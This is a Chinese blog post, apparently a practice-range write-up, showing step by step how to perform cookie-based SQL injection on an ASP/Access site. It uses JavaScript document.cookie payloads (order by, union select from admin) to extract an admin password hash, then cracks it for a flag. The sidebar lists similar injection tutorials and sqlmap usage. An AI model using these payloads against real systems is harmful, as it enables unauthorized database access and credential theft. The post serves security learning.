Acess注入—Cookie注入

最新推荐文章于 2024-05-30 16:16:07 发布
最新推荐文章于 2024-05-30 16:16:07 发布
阅读量208 收藏
点赞数 2
分类专栏: 网络安全 文章标签: 黑盒测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/106050363
版权

Acess注入—Cookie注入

靶场地址
原理:php中的$_REQUEST[] 可以获取POST|GET|COOKIE传参,可以通过burp的抓包,修改cookie的参数,也可以通过控制台,利用JS来进行cookie注入

第一题:

我们进去靶场随便点一个链接,进入具有id传参的界面。
在这里插入图片描述我们先尝试,是否能进行GET传参进行显错注入
加粗样式
发现被禁止了,于是我们尝试cookie注入
打开burp抓包
在这里插入图片描述去掉上面的id=171,在cookie后面加;闭合,再输入id=171,看看语句是是否执行
在这里插入图片描述然后放包,发现上面没有id传参,但是页面返回正常
在这里插入图片描述代表,我输入的语句成功实行了,于是在控制台,利用JS判断字段数

document.cookie="id="+escape("171 order by 1")

在这里插入图片描述页面正常,我们继续增大,到11

document.cookie="id="+escape("171 order by 11")

在这里插入图片描述出错,我们输入10

document.cookie="id="+escape("171 order by 10")

在这里插入图片描述页面正常,于是我们判定存在10个字段,继续输入JS语句

document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

在这里插入图片描述因为access数据库,只有一个库名,所以需要写from admin ,找到数据库的输出位2,3,7,8,9
判断表名,我们可以用猜的方法,手动爆破
在这里插入图片描述但是对于新手来说,更适合用burp爆破,于是我们抓包
在这里插入图片描述抓到数据包,找到可能的表名
在这里插入图片描述很多表名,但是一般在盛行Access数据库的年代,都在admin表的username和password字段
所以我们直接输入

document.cookie="id="+escape("171 union select 1,username,3,4,5,6,7,8,9,10 from admin")

在这里插入图片描述找到账号admin
继续输入

document.cookie="id="+escape("171 union select 1,password,3,4,5,6,7,8,9,10 from admin")

在这里插入图片描述找到密码
b9a2a2b5dffb918c
在后台登陆
在这里插入图片描述但是密码错误

在这里插入图片描述进行密码md5解密
在这里插入图片描述在这里插入图片描述拿到flag:zkz{welcome-control}

猫鼠信安
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Access数据库——Cookie注入
weixin_41487522的博客
04-27 361
Access数据库——Cookie注入 Cookie注入简介 什么是Cookie? Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。无论何时用户链接到服务器,Web 站点都可以访问 Cookie 信息。说白了Cookie就是代表你身份的字符串,网站根据Cook...
Access数据库注入高级玩法
03-03
### Access数据库注入高级玩法 #### 知识点概述 本文将深入探讨Access数据库注入的一些高级技巧,包括如何利用SQL注入漏洞获取敏感数据、探索数据库结构等。这些技巧不仅适用于安全测试人员进行渗透测试,同时也为...
access学习_Access注入Cookie注入(学习笔记)
weixin_39742727的博客
11-21 136
理论Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪.Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同Cookie注入典型步骤1.寻找形如“.asp?id=xx”类的带参数的URL。2.去掉“id=xx”查看页面显示是否正常...
Access注入Cookie注入
最新发布
白帽黑客八哥的博客
05-30 1400
注:Cookie传参值需要URL编码Cookie 是指某些网站为了辨别用户身份而储存在用户本地终端上的数据(通常经过加密通俗来讲,Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。Cookie 的出现是为了给用户更好的体验性,从安全的角度来讲,Cookie本身就是不安全的。
Access注入--cookie注入
weixin_45922278的博客
10-17 253
Access注入--cookie注入 针对老网站: asp aspx php<5.4以下> 题目: http://59.63.200.79:8004 1.http://59.63.200.79:8004/shownews.asp?id=171-1 #页面有变化,存在注入 2.http://59.63.200.79:8004/shownews.asp?id=171' and or...
Access注入Cookie注入
Mr.Huang_的博客
09-02 165
一、Cookie注入简介 二、怎么修改Cookie 我们知道了Cookie注入的原理~那么下一步我们该学习的就是如何修改网站原有的Cookie 我们可以使用很多方法设置Cookie 这2点同时满足才可以执行!!!!!!!!!!! 1、只有旧的失效了(比如删了?id=170,也就是删了get传参),才会接受新的传参方式(比如这里的get传参失效,现在新的cookie传参才会生效) 2、如果由一种传参换成新的一种传参,第一次一定要在URL栏刷新,才会接受新的传参,否则还是接受原来的传参,第一次之后随便在那刷新
SQLMAP的注入使用
05-13
该命令用于判断目标网站是否存在Cookie注入漏洞。 3. python SQLmap.py -u "xxxx.com" --data "xx=xx&xx=xx" 【判断url是否存在post注入】 该命令用于判断目标网站是否存在POST注入漏洞。 GET注入详解: * ...
Access数据库注入高级玩法.pdf
07-13
Access 数据库注入高级玩法 ...* cookie 注入语句 Access 数据库注入高级玩法是一种高级的数据库攻击技术,旨在攻击 Access 数据库,获取敏感信息。开发者应该注意防止 Access 数据库注入漏洞,保护数据库安全。
asp终极防范SQL注入漏洞
01-02
下面给出4个函数,足够你抵挡一切SQL注入漏洞!读懂代码,你就能融会贯通。 注意要对所有的request对象进行过滤:包括 request.cookie, request.ServerVariables 等等容易被忽视的对象: 代码如下: function killn...
蚂蚁注入工具1.0.0.19
07-13
采用先进的注入检测引擎,能检测各种主流数据库的sql注入与渗透,支持的数据库有mssql、mysql、...软件集"注入点扫描"、"管理入口检测"、"跨站脚本攻击"、"cookie注入检测"于一身的综合注入工具! 是一款不错的注入工具。
网络安全从入门到精通(第六章-1) Access注入 —— Cookie注入
划水的小白白
02-02 411
本文内容: ~Cookie注入简介 ~怎么修改Cookie ~Cookie注入实战注意 ~稍微总结注入
网络安全零基础入门(第六章-1)Access注入——Cookie注入
素笺
03-31 203
每日一句:时间说明一切。今天可以后悔昨天,但绝不明天愧疚今天。 本篇内容:Cookie注入简介      如何修改Cookie      Cookie注入实战注意 一、Cookie注入简介 1.什么是cookie?     cookie就相当于身份证,网站根据cookie来识别你是谁;     如果你获取了cookie,你就可以免密登录管理员账户。      2.cookie机制本身就不安全 ...
Access数据库注入cookie注入
seek_2022的博客
05-02 1721
文章目录一、cookie注入简介(一)什么是cookie(二)为什么会存在cookie注入?二、如何修改cookie(一)通过Javascript来设置Cookie(二)通过浏览器的Application来修改(三)通过burp抓包去修改cookie(四)通过浏览器插件进行修改三、cookie注入靶场思路(一)靶场需要注意的地方(二)如何删除GET传参(三)access数据库注入的特点四、靶场实战(一)测试cookie传参(二)测试cookie注入(三)爆破表名(四)判断字段数(五)判断显错位(六)查询ad
Access——Cookie注入
qq_45300786的博客
07-18 527
这里我们使用cookie来传参的,注意php5.4以上的版本就不会接受cookie传参了 下面我们就在本地服务器来试一试 先写一个php传参文件 然后进行传参,可发现,传参成功。 那么接下来我们就来使用cookie传参 ...
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1216
Cookie注入简介 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
Access之cookie手工注入
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 258
cookie注入的原理其实并不复杂。学过ASP语言的应该都知道,在ASP中 例如: id=request.querystring(ID); id=request.form(ID); 在正常情况下程序员应该按以上规范进行代码的编写,但是部分程序员,为了方便却将代码写成了如下格式: id=request(ID); 虽然此时也加了防注入程序。但是,防注入程序并不支持基于cookie提交的数据。...
Access注入---Cookie注入
Mic_x_的博客
10-04 243
Access注入----Cookie注入 Access数据库(微软) 逐渐淘汰 (没有库的概念,是表的集合) Access没有系统自带库 Cookie注入(头注入HEAD注入的) php中产生Cookie注入的可能性小,但ASP产生Cookie注入的可能性大 Access的核心:request=>$_REQUEST(POST GET COOKIECookie注入的适用范围:POST和GET传参被过滤、被检测,而Cookie不被检测的时候使用
SQL注入系列之ASP+ACCESS手动注入(二)----Cookie注入
fendo
02-26 7236
一、简介 Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站和电子商务网站中的“购物车”。 Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同,两者都是针对数
sqlmap使用详解:自动化SQL注入工具
sqlmap支持广泛的数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。这使得它能够广泛应用于各种环境,检测不同数据库平台...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值